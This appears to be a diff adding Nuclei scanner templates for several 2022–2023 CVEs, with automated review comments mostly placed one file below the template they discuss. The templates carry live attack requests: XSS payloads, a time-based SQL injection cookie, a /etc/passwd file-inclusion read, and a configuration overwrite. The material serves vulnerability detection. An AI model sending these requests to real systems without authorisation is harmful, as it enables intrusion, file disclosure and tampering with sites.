+ - type: dsl
+ dsl:
+ - 'status_code_3 == 200'
+ - 'contains(content_type_3, "text/html")'
+ - 'contains(body_3, "")'
+ - 'contains(body_3, "rukovoditel")'
+ condition: and
+
+ extractors:
+ - type: regex
+ name: nonce
+ group: 1
+ regex:
+ - 'id="form_session_token" value="(.*)" type="hidden"'
+ internal: true
diff --git a/http/cves/2022/CVE-2022-44952.yaml b/http/cves/2022/CVE-2022-44952.yaml
new file mode 100644
index 0000000000..868fa826c6
--- /dev/null
+++ b/http/cves/2022/CVE-2022-44952.yaml
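Review bot: `cvss-metrics` is `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`, the vector that CVE-2023-1730 in this same commit scores at 9.8, while `cvss-score` here is 5.4 and the template needs credentials (login request, `authenticated` tag); the vector should be the one the sibling Rukovoditel templates use, `cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N`. CVE-2022-44952 carries the same mismatched vector and score. This template is also the only one in the set with `redirects: true` and no `max-redirects`, so the redirect depth falls back to the engine default rather than the `2` the others pin.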
@@ -0,0 +1,142 @@
+id: CVE-2022-44952
+
+info:
+ name: Rukovoditel <= 3.2.1 - Cross Site Scripting
+ author: r3Y3r53
+ severity: medium
+ description: |
+ Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in /index.php?module=configuration/application. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Copyright Text field after clicking "Add".
+ reference:
+ - https://github.com/anhdq201/rukovoditel/issues/9
+ - http://rukovoditel.com/
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-44952
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 5.4
+ cve-id: CVE-2022-44952
+ cwe-id: CWE-79
+ metadata:
+ verified: true
+ tags: cve,cve2022,rukovoditel,xss,authenticated
+
+http:
+ - raw:
+ - |
+ GET /index.php?module=users/login HTTP/1.1
+ Host: {{Hostname}}
+
+ - |
+ POST /index.php?module=users/login&action=login HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ form_session_token={{nonce}}&username={{username}}&password={{password}}
+
+ - |
+ POST /index.php?module=configuration/save&redirect_to=configuration/application HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryMh2HSjWbM7zJjWOA
+
+ ------WebKitFormBoundaryMh2HSjWbM7zJjWOA
+ Content-Disposition: form-data; name="form_session_token"
+
+ {{nonce}}
+ ------WebKitFormBoundaryMh2HSjWbM7zJjWOA
+ Content-Disposition: form-data; name="CFG[APP_NAME]"
+
+ Test
+ ------WebKitFormBoundaryMh2HSjWbM7zJjWOA
+ Content-Disposition: form-data; name="CFG[APP_SHORT_NAME]"
+
+ test
+ ------WebKitFormBoundaryMh2HSjWbM7zJjWOA
+ Content-Disposition: form-data; name="APP_LOGO"; filename=""
+ Content-Type: application/octet-stream
+
+
+ ------WebKitFormBoundaryMh2HSjWbM7zJjWOA
+ Content-Disposition: form-data; name="CFG[APP_LOGO]"
+
+
+ ------WebKitFormBoundaryMh2HSjWbM7zJjWOA
+ Content-Disposition: form-data; name="CFG[APP_LOGO_URL]"
+
+
+ ------WebKitFormBoundaryMh2HSjWbM7zJjWOA
+ Content-Disposition: form-data; name="APP_FAVICON"; filename=""
+ Content-Type: application/octet-stream
+
+
+ ------WebKitFormBoundaryMh2HSjWbM7zJjWOA
+ Content-Disposition: form-data; name="CFG[APP_FAVICON]"
+
+
+ ------WebKitFormBoundaryMh2HSjWbM7zJjWOA
+ Content-Disposition: form-data; name="CFG[APP_COPYRIGHT_NAME]"
+
+
+ ------WebKitFormBoundaryMh2HSjWbM7zJjWOA
+ Content-Disposition: form-data; name="CFG[APP_LANGUAGE]"
+
+ english.php
+ ------WebKitFormBoundaryMh2HSjWbM7zJjWOA
+ Content-Disposition: form-data; name="CFG[APP_SKIN]"
+
+
+ ------WebKitFormBoundaryMh2HSjWbM7zJjWOA
+ Content-Disposition: form-data; name="CFG[APP_TIMEZONE]"
+
+ America/New_York
+ ------WebKitFormBoundaryMh2HSjWbM7zJjWOA
+ Content-Disposition: form-data; name="CFG[APP_ROWS_PER_PAGE]"
+
+ 10
+ ------WebKitFormBoundaryMh2HSjWbM7zJjWOA
+ Content-Disposition: form-data; name="CFG[APP_DATE_FORMAT]"
+
+ m/d/Y
+ ------WebKitFormBoundaryMh2HSjWbM7zJjWOA
+ Content-Disposition: form-data; name="CFG[APP_DATETIME_FORMAT]"
+
+ m/d/Y H:i
+ ------WebKitFormBoundaryMh2HSjWbM7zJjWOA
+ Content-Disposition: form-data; name="CFG[APP_NUMBER_FORMAT]"
+
+ 2/./*
+ ------WebKitFormBoundaryMh2HSjWbM7zJjWOA
+ Content-Disposition: form-data; name="CFG[APP_FIRST_DAY_OF_WEEK]"
+
+ 0
+ ------WebKitFormBoundaryMh2HSjWbM7zJjWOA
+ Content-Disposition: form-data; name="CFG[DROP_DOWN_MENU_ON_HOVER]"
+
+ 0
+ ------WebKitFormBoundaryMh2HSjWbM7zJjWOA
+ Content-Disposition: form-data; name="CFG[DISABLE_CHECK_FOR_UPDATES]"
+
+ 0
+ ------WebKitFormBoundaryMh2HSjWbM7zJjWOA--
+
+ - |
+ @timeout: 5s
+ GET /index.php?module=dashboard/ HTTP/1.1
+ Host: {{Hostname}}
+
+ cookie-reuse: true
+ redirects: true
+ matchers:
+ - type: dsl
+ dsl:
+ - 'status_code_4 == 200'
+ - 'contains(content_type_4, "text/html")'
+ - 'contains(body_4, "")'
+ - 'contains(body_4, "rukovoditel")'
+ condition: and
+
+ extractors:
+ - type: regex
+ name: nonce
+ group: 1
+ regex:
+ - 'id="form_session_token" value="(.*)" type="hidden"'
+ internal: true
diff --git a/http/cves/2023/CVE-2023-0514.yaml b/http/cves/2023/CVE-2023-0514.yaml
new file mode 100644
index 0000000000..9cbdadc655
--- /dev/null
+++ b/http/cves/2023/CVE-2023-0514.yaml
@@ -0,0 +1,46 @@
+id: CVE-2023-0514
+
+info:
+ name: Membership Database <= 1.0 - Cross-Site Scripting
+ author: r3Y3r53
+ severity: medium
+ description: |
+ Membership Database before 1.0 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+ reference:
+ - https://wpscan.com/vulnerability/c6cc400a-9bfb-417d-9206-5582a49d0f05
+ - https://wordpress.org/plugins/member-database/
+ - https://nvd.nist.gov/vuln/detail/CVE-2023-0514
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2023-0514
+ cwe-id: CWE-79
+ metadata:
+ verified: true
+ tags: cve,cve2023,membership-database,wp,wp-plugin,wordpress,authenticated,xss
+
+http:
+ - raw:
+ - |
+ POST /wp-login.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ log={{username}}&pwd={{password}}&wp-submit=Log+In
+
+ - |
+ POST /wp-admin/admin.php?page=member-database%2Flist_members.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ action=sort&where=id&operator=%3D&value=asd%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%2F%2F&sortBy=id&ascdesc=asc
+
+ cookie-reuse: true
+ matchers:
+ - type: dsl
+ dsl:
+ - 'status_code_2 == 200'
+ - 'contains(content_type_2, "text/html")'
+ - 'contains(body_2, "")'
+ - 'contains(body_2, "Member Database")'
+ condition: and
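Review bot: The third request replaces the target's whole application configuration with fixed values (`CFG[APP_NAME]=Test`, `CFG[APP_SHORT_NAME]=test`, `CFG[APP_LANGUAGE]=english.php`, `CFG[APP_TIMEZONE]=America/New_York`, the date, number and rows-per-page settings, and empty logo/favicon fields), so a successful run overwrites the administrator's settings rather than only planting the test marker; that side effect belongs in the description and tags, and a less destructive form would first fetch the configuration page and echo the current values back with only the copyright field changed. The `CFG[APP_COPYRIGHT_NAME]` part, the field the description names, is empty as rendered; confirm the committed file actually carries the payload there. `cvss-metrics` is the 9.8 vector while `cvss-score` is 5.4, the same inconsistency noted on CVE-2022-44951.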
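Review bot: The description attributes the flaw to the `tab` parameter, but the second request injects into `value` (`action=sort&where=id&operator=%3D&value=...`) and sends no `tab` parameter at all; either the description or the request describes a different issue, and the wpscan reference should settle which one to fix. `cvss-metrics` says `PR:N`, yet the template logs in first and is tagged `authenticated`, so one of those is wrong too. `info.name` says `<= 1.0` while the description says `before 1.0`. As rendered, `contains(body_2, "")` is always true, so the matcher currently only proves the admin page loaded.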
diff --git a/http/cves/2023/CVE-2023-1730.yaml b/http/cves/2023/CVE-2023-1730.yaml
new file mode 100644
index 0000000000..8d9da20898
--- /dev/null
+++ b/http/cves/2023/CVE-2023-1730.yaml
@@ -0,0 +1,36 @@
+id: CVE-2023-1730
+
+info:
+ name: SupportCandy < 3.1.5 - Unauthenticated SQL Injection
+ author: theamanrawat
+ severity: critical
+ description: |
+ The SupportCandy WordPress plugin before 3.1.5 does not validate and escape user input before using it in an SQL statement, which could allow unauthenticated attackers to perform SQL injection attacks.
+ remediation: Fixed in version 3.1.5
+ reference:
+ - https://wpscan.com/vulnerability/44b51a56-ff05-4d50-9327-fc9bab74d4b7
+ - https://wordpress.org/plugins/supportcandy/
+ - https://nvd.nist.gov/vuln/detail/CVE-2023-1730
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2023-1730
+ cwe-id: CWE-89
+ metadata:
+ verified: "true"
+ tags: cve,cve2023,sqli,wpscan,wordpress,supportcandy,unauth
+
+http:
+ - raw:
+ - |
+ GET / HTTP/1.1
+ Host: {{Hostname}}
+ Cookie: wpsc_guest_login_auth={"email":"' AND (SELECT 42 FROM (SELECT(SLEEP(6)))NNTu)-- cLmu"}
+
+ matchers:
+ - type: dsl
+ dsl:
+ - 'duration>=6'
+ - 'status_code == 200'
+ - 'contains(body, "supportcandy")'
+ condition: and
diff --git a/http/cves/2023/CVE-2023-1835.yaml b/http/cves/2023/CVE-2023-1835.yaml
new file mode 100644
index 0000000000..35d0e2d486
--- /dev/null
+++ b/http/cves/2023/CVE-2023-1835.yaml
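Review bot: `verified: "true"` is a quoted string here (and in CVE-2023-30256) while every other template in this commit writes the boolean `true`; tooling that filters on the flag will see two different values, so `verified: true` keeps the set consistent. The detection rests on `duration>=6` from a single request, which a slow or overloaded host can satisfy on its own; a comment on the matcher stating that the timing threshold is the sole evidence, such as `# time-based only: a >=6s response from a slow host will also match`, would tell operators how to read a hit. The `wpscan` tag is used here but not on the other wpscan-referenced templates in the commit.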
@@ -0,0 +1,43 @@
+id: CVE-2023-1835
+
+info:
+ name: Ninja Forms < 3.6.22 - Cross-Site Scripting
+ author: r3Y3r53
+ severity: medium
+ description: |
+ Ninja Forms before 3.6.22 is susceptible to cross-site scripting via the page parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+ reference:
+ - https://wpscan.com/vulnerability/b5fc223c-5ec0-44b2-b2f6-b35f9942d341
+ - https://wordpress.org/plugins/ninja-forms/advanced/
+ - https://nvd.nist.gov/vuln/detail/CVE-2023-1835
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2023-1835
+ cwe-id: CWE-79
+ metadata:
+ verified: true
+ tags: cve,cve2023,ninja,forms,wp,wp-plugin,wordpress,authenticated,xss
+
+http:
+ - raw:
+ - |
+ POST /wp-login.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ log={{username}}&pwd={{password}}&wp-submit=Log+In
+
+ - |
+ GET /wp-admin/admin.php?page=nf-processing&title=%253Csvg%252Fonload%253Dalert%2528document.domain%2529%253E HTTP/1.1
+ Host: {{Hostname}}
+
+ cookie-reuse: true
+ matchers:
+ - type: dsl
+ dsl:
+ - 'status_code_2 == 200'
+ - 'contains(content_type_2, "text/html")'
+ - 'contains(body_2, "")'
+ - 'contains(body_2, "Ninja Forms")'
+ condition: and
diff --git a/http/cves/2023/CVE-2023-1890.yaml b/http/cves/2023/CVE-2023-1890.yaml
new file mode 100644
index 0000000000..ee72893fa9
--- /dev/null
+++ b/http/cves/2023/CVE-2023-1890.yaml
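Review bot: The description attributes the XSS to the `page` parameter, but the request puts the payload in `title` (`page=nf-processing&title=...`), and that payload is double URL-encoded (`%253C`), which presumably relies on the plugin decoding it a second time before output; a one-line comment above the request, e.g. `# NOTE: title is double URL-encoded on purpose - confirm the page decodes it again before rendering`, would stop the next reader from "fixing" the encoding. The tags `ninja,forms` are two tags for one plugin; `ninja-forms` matches the slug in the reference URL. As rendered, `contains(body_2, "")` is always true and the matcher does not look for the reflected `<svg/onload=...>` marker.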
@@ -0,0 +1,44 @@
+id: CVE-2023-1890
+
+info:
+ name: Tablesome < 1.0.9 - Cross-Site Scripting
+ author: r3Y3r53
+ severity: medium
+ description: |
+ Tablesome before 1.0.9 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+ reference:
+ - https://wpscan.com/vulnerability/8ef64490-30cd-4e07-9b7c-64f551944f3d
+ - https://wordpress.org/plugins/tablesome/
+ - https://nvd.nist.gov/vuln/detail/CVE-2023-1890
+ remediation: Fixed in version 1.0.9.
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2023-1890
+ cwe-id: CWE-79
+ metadata:
+ verified: true
+ tags: cve,cve2023,wp,wp-plugin,wordpress,authenticated,xss,tablesome
+
+http:
+ - raw:
+ - |
+ POST /wp-login.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ log={{username}}&pwd={{password}}&wp-submit=Log+In
+
+ - |
+ GET /wp-admin/edit.php?post_type=tablesome_cpt&a%22%3e%3cscript%3ealert`document.domain`%3c%2fscript%3e HTTP/1.1
+ Host: {{Hostname}}
+
+ cookie-reuse: true
+ matchers:
+ - type: dsl
+ dsl:
+ - 'status_code_2 == 200'
+ - 'contains(content_type_2, "text/html")'
+ - 'contains(body_2, "")'
+ - 'contains(body_2, "tablesome")'
+ condition: and
diff --git a/http/cves/2023/CVE-2023-2023.yaml b/http/cves/2023/CVE-2023-2023.yaml
new file mode 100644
index 0000000000..7b89d30332
--- /dev/null
+++ b/http/cves/2023/CVE-2023-2023.yaml
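Review bot: The description names the `tab` parameter as the sink, but the request carries no `tab` parameter; the payload is appended as a bare query key (`&a%22%3e%3cscript%3e...`), which suggests the reflection is of the full request URI rather than of a specific parameter. Either the request should exercise `tab` or the description should say what is actually reflected, so that a maintainer comparing the template with the wpscan advisory is not misled. As rendered, `contains(body_2, "")` is always true and the matcher cannot confirm the reflection.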
@@ -0,0 +1,44 @@
+id: CVE-2023-2023
+
+info:
+ name: Custom 404 Pro < 3.7.3 - Cross-Site Scripting
+ author: r3Y3r53
+ severity: medium
+ description: |
+ Custom 404 Pro before 3.7.3 is susceptible to cross-site scripting via the search parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+ remediation: Fixed in version 3.7.3
+ reference:
+ - https://wpscan.com/vulnerability/8859843a-a8c2-4f7a-8372-67049d6ea317
+ - https://wordpress.org/plugins/custom-404-pro/advanced/
+ - https://nvd.nist.gov/vuln/detail/CVE-2023-2023
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2023-2023
+ cwe-id: CWE-79
+ metadata:
+ verified: true
+ tags: cve,cve2023,xss,wordpress,wp-plugin,authenticated,custom-404-pro
+
+http:
+ - raw:
+ - |
+ POST /wp-login.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ log={{username}}&pwd={{password}}&wp-submit=Log+In
+
+ - |
+ GET /wp-admin/admin.php?page=c4p-main&s={{randstr}}%22%20style=animation-name:rotation%20onanimationstart=alert(document.domain)// HTTP/1.1
+ Host: {{Hostname}}
+
+ cookie-reuse: true
+ matchers:
+ - type: dsl
+ dsl:
+ - 'status_code_2 == 200'
+ - 'contains(content_type_2, "text/html")'
+ - 'contains(body_2, "onanimationstart=alert(document.domain)//")'
+ - 'contains(body_2, "Custom 404 Pro")'
+ condition: and
diff --git a/http/cves/2023/CVE-2023-2252.yaml b/http/cves/2023/CVE-2023-2252.yaml
new file mode 100644
index 0000000000..229a2214db
--- /dev/null
+++ b/http/cves/2023/CVE-2023-2252.yaml
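Review bot: The tag list omits `wp`, which the other WordPress plugin templates in this commit (CVE-2023-0514, -1835, -1890, -2252, -2272, -30777) all carry alongside `wp-plugin` and `wordpress`, so a `wp`-filtered run would skip this one. `remediation:` sits between `description` and `reference` here but after `reference` in CVE-2023-1890 and -30777; one placement across the set would be tidier. The matcher is the right shape: it checks for the reflected `onanimationstart=alert(document.domain)//` marker instead of an empty string.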
@@ -0,0 +1,42 @@
+id: CVE-2023-2252
+
+info:
+ name: Directorist < 7.5.4 - Local File Inclusion
+ author: r3Y3r53
+ severity: medium
+ description: |
+ Directorist before 7.5.4 is susceptible to Local File Inclusion as it does not validate the file parameter when importing CSV files.
+ remediation: Fixed in version 7.5.4
+ reference:
+ - https://wpscan.com/vulnerability/9da6eede-10d0-4609-8b97-4a5d38fa8e69
+ - https://wordpress.org/plugins/directorist/advanced/
+ - https://nvd.nist.gov/vuln/detail/CVE-2023-2252
+ metadata:
+ max-request: 2
+ verified: true
+ tags: cve,cve2023,lfi,directorist,wordpress,wp-plugin,wp,authenticated
+
+http:
+ - raw:
+ - |
+ POST /wp-login.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ log={{username}}&pwd={{password}}&wp-submit=Log+In
+
+ - |
+ GET /wp-admin/edit.php?post_type=at_biz_dir&page=tools&step=2&file=%2Fetc%2Fpasswd&delimiter=%3B HTTP/1.1
+ Host: {{Hostname}}
+
+ cookie-reuse: true
+ matchers-condition: and
+ matchers:
+ - type: regex
+ part: body
+ regex:
+ - "root:[x*]:0:0"
+
+ - type: status
+ status:
+ - 200
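Review bot: This template has no `classification` block (no `cvss-metrics`, `cvss-score`, `cve-id`, `cwe-id`) while every other CVE template in the commit carries one; the NVD entry it references supplies the vector and score, and the CWE should be the file-inclusion/path-traversal one rather than copied from the XSS siblings. `metadata.max-request: 2` is correct here and is absent from the other two-request templates in this set, which could adopt it the same way. The body regex `root:[x*]:0:0` is a sound positive check, so this is purely a metadata gap.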
@@ -0,0 +1,46 @@
+id: CVE-2023-2272
+
+info:
+ name: Tiempo.com <= 0.1.2 - Cross-Site Scripting
+ author: r3Y3r53
+ severity: medium
+ description: |
+ Tiempo.com before 0.1.2 is susceptible to cross-site scripting via the page parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+ reference:
+ - https://wpscan.com/vulnerability/dba60216-2753-40b7-8f2b-6caeba684b2e
+ - https://wordpress.org/plugins/tiempocom/
+ - https://nvd.nist.gov/vuln/detail/CVE-2023-2272
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2023-2272
+ cwe-id: CWE-79
+ metadata:
+ verified: true
+ tags: cve,cve2023,wp,wp-plugin,wordpress,authenticated,xss,tiempocom
+
+http:
+ - raw:
+ - |
+ POST /wp-login.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ log={{username}}&pwd={{password}}&wp-submit=Log+In
+
+ - |
+ POST /wp-admin/admin.php?page=tiempocom%2Fapp%2Fadmin.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ page=%22%3E%3Csvg%2Fonload%3Dalert%28document.domain%29%3E
+
+ cookie-reuse: true
+ matchers:
+ - type: dsl
+ dsl:
+ - 'status_code_2 == 200'
+ - 'contains(content_type_2, "text/html")'
+ - 'contains(body_2, "")'
+ - 'contains(body_2, "Tiempo")'
+ condition: and
diff --git a/http/cves/2023/CVE-2023-30256.yaml b/http/cves/2023/CVE-2023-30256.yaml
new file mode 100644
index 0000000000..ce6d92452d
--- /dev/null
+++ b/http/cves/2023/CVE-2023-30256.yaml
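Review bot: `info.name` says `<= 0.1.2` while the description says `before 0.1.2`; the two disagree on whether 0.1.2 itself is affected, and the wpscan reference should settle it. As rendered, `contains(body_2, "")` is always true and `contains(body_2, "Tiempo")` only proves the admin page loaded, so the matcher should look for the `"><svg/onload=alert(document.domain)>` marker that the `page` form field sends. `cvss-metrics` carries `PR:N` although the template logs in first and is tagged `authenticated`, the same mismatch as CVE-2023-0514.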
@@ -0,0 +1,44 @@
+id: CVE-2023-30256
+
+info:
+ name: Webkul QloApps 1.5.2 - Cross-site Scripting
+ author: theamanrawat
+ severity: medium
+ description: |
+ Cross Site Scripting vulnerability found in Webkil QloApps v.1.5.2 allows a remote attacker to obtain sensitive information via the back and email_create parameters in the AuthController.php file.
+ reference:
+ - https://github.com/webkul/hotelcommerce
+ - http://packetstormsecurity.com/files/172542/Webkul-Qloapps-1.5.2-Cross-Site-Scripting.html
+ - https://github.com/ahrixia/CVE-2023-30256
+ - https://nvd.nist.gov/vuln/detail/CVE-2023-30256
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2023-30256
+ cwe-id: CWE-79
+ metadata:
+ verified: "true"
+ tags: cve,cve2023,xss,webkul-qloapps,unauth
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/?rand=1679996611398&controller=authentication&SubmitCreate=1&ajax=true&email_create=a&back=xss%20onfocus%3dalert(document.domain)%20autofocus%3d%20xss&token=6c62b773f1b284ac4743871b300a0c4d"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "xss onfocus=alert(document.domain) autofocus= xss"
+ - "hasConfirmation"
+ condition: and
+
+ - type: word
+ part: header
+ words:
+ - 'text/html'
+
+ - type: status
+ status:
+ - 200
diff --git a/http/cves/2023/CVE-2023-30777.yaml b/http/cves/2023/CVE-2023-30777.yaml
new file mode 100644
index 0000000000..3a90d33596
--- /dev/null
+++ b/http/cves/2023/CVE-2023-30777.yaml
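Review bot: The request hard-codes `token=6c62b773f1b284ac4743871b300a0c4d` and `rand=1679996611398`, whereas CVE-2023-36289 in this same patch hits the same authentication controller with `token={{randstr}}`; use `{{randstr}}` here as well unless the fixed value is genuinely required, and if it is, say so in a comment so nobody "fixes" it later. The reflected needle `xss onfocus=alert(document.domain) autofocus= xss` contains no HTML-special characters, so it is also present when the input is escaped; prefer matching on the part that breaks out of the attribute if the advisory shows one. Minor: `description` misspells the vendor as "Webkil", and `verified: "true"` is a quoted string while the other new templates use the bare boolean `verified: true`.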
@@ -0,0 +1,44 @@
+id: CVE-2023-30777
+
+info:
+ name: Advanced Custom Fields < 6.1.6 - Cross-Site Scripting
+ author: r3Y3r53
+ severity: medium
+ description: |
+ Advanced Custom Fields beofre 6.1.6 is susceptible to cross-site scripting via the post_status parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+ reference:
+ - https://wpscan.com/vulnerability/95ded80f-a47b-411e-bd17-050439bf565f
+ - https://wordpress.org/plugins/advanced-custom-fields/advanced/
+ - https://nvd.nist.gov/vuln/detail/CVE-2023-30777
+ remediation: Fixed in version 6.1.6.
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2023-30777
+ cwe-id: CWE-79
+ metadata:
+ verified: true
+ tags: cve,cve2023,advance-custom-field,wp,wp-plugin,wordpress,authenticated,xss
+
+http:
+ - raw:
+ - |
+ POST /wp-login.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ log={{username}}&pwd={{password}}&wp-submit=Log+In
+
+ - |
+ GET /wp-admin/edit.php?post_type=acf-post-type&post_status=%22style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29%2F%2F HTTP/1.1
+ Host: {{Hostname}}
+
+ cookie-reuse: true
+ matchers:
+ - type: dsl
+ dsl:
+ - 'status_code_2 == 200'
+ - 'contains(content_type_2, "text/html")'
+ - 'contains(body_2, "onanimationstart=alert(document.domain)//")'
+ - 'contains(body_2, "Advanced Custom Fields")'
+ condition: and
diff --git a/http/cves/2023/CVE-2023-36287.yaml b/http/cves/2023/CVE-2023-36287.yaml
new file mode 100644
index 0000000000..eb0ef67c53
--- /dev/null
+++ b/http/cves/2023/CVE-2023-36287.yaml
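Review bot: The DSL term `contains(body_2, "onanimationstart=alert(document.domain)//")` cannot tell an unescaped reflection from an escaped one: the attribute-escaped form `&quot;style=animation-name:rotation onanimationstart=alert(document.domain)//` still contains that substring, so a patched site that echoes `post_status` safely would also match. Include the breakout quote in the needle, for example a `word` matcher on `part: body` with `- '"style=animation-name:rotation onanimationstart=alert(document.domain)//'` (YAML single quotes avoid escaping the `"`), keeping the status and content-type checks. Also `description` has the typo "beofre", and the tag `advance-custom-field` does not match the plugin slug `advanced-custom-fields` used in the reference URL.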
@@ -0,0 +1,47 @@
+id: CVE-2023-36287
+
+info:
+ name: Webkul QloApps 1.6.0 - Cross-site Scripting
+ author: theamanrawat
+ severity: medium
+ description: |
+ An unauthenticated Cross-Site Scripting (XSS) vulnerability found in Webkul QloApps 1.6.0 allows an attacker to obtain a user's session cookie and then impersonate that user via POST controller parameter.
+ reference:
+ - https://github.com/webkul/hotelcommerce
+ - https://flashy-lemonade-192.notion.site/Cross-site-scripting-via-controller-parameter-in-QloApps-1-6-0-97e409ce164f40d195b625b9bf719900
+ - https://nvd.nist.gov/vuln/detail/CVE-2023-36287
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2023-36287
+ cwe-id: CWE-79
+ metadata:
+ verified: "true"
+ tags: cve,cve2023,xss,webkul-qloapps,unauth
+
+http:
+ - raw:
+ - |
+ POST / HTTP/2
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ controller=change-currency9405'-alert(document.domain)-'&id_currency=
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "'change-currency9405'-alert(document.domain)-'';"
+ - "customizationIdMessage"
+ condition: and
+
+ - type: word
+ part: header
+ words:
+ - 'text/html'
+
+ - type: status
+ status:
+ - 200
diff --git a/http/cves/2023/CVE-2023-36289.yaml b/http/cves/2023/CVE-2023-36289.yaml
new file mode 100644
index 0000000000..d7051ea8a8
--- /dev/null
+++ b/http/cves/2023/CVE-2023-36289.yaml
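Review bot: The raw request line is `POST / HTTP/2` while every other raw template in this patch uses `HTTP/1.1`; a raw request is sent by nuclei's own client whatever version string is written (confirm), so the value is at best misleading and should be `POST / HTTP/1.1`. The first word `'change-currency9405'-alert(document.domain)-'';` keeps the surrounding quotes and semicolon, so it verifies a JavaScript-string breakout rather than a bare reflection; that is the right shape and worth keeping. Minor: `verified: "true"` is a quoted string, unlike the bare boolean used by the other new templates.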
@@ -0,0 +1,50 @@
+id: CVE-2023-36289
+
+info:
+ name: Webkul QloApps 1.6.0 - Cross-site Scripting
+ author: theamanrawat
+ severity: medium
+ description: |
+ An unauthenticated Cross-Site Scripting (XSS) vulnerability found in Webkul QloApps 1.6.0 allows an attacker to obtain a user's session cookie and then impersonate that user via POST email_create and back parameter.
+ reference:
+ - https://github.com/webkul/hotelcommerce
+ - https://flashy-lemonade-192.notion.site/Cross-site-scripting-in-POST-Request-via-email_create-and-back-parameter-in-QloApps-1-6-0-e05548203d744daf9047d82fc94b19b7
+ - https://nvd.nist.gov/vuln/detail/CVE-2023-36289
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2023-36289
+ cwe-id: CWE-79
+ metadata:
+ verified: "true"
+ tags: cve,cve2023,xss,webkul-qloapps,unauth
+
+variables:
+ email: "{{randstr}}@{{rand_base(5)}}.com"
+
+http:
+ - raw:
+ - |
+ POST / HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ SubmitCreate=1&ajax=true&back=my-account&controller=authentication&email={{email}}&email_create={{email}}"%20onmouseover=alert(document.domain)%20y=&token={{randstr}}
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - 'onmouseover=alert(document.domain)'
+ - 'hasConfirmation'
+ condition: and
+
+ - type: word
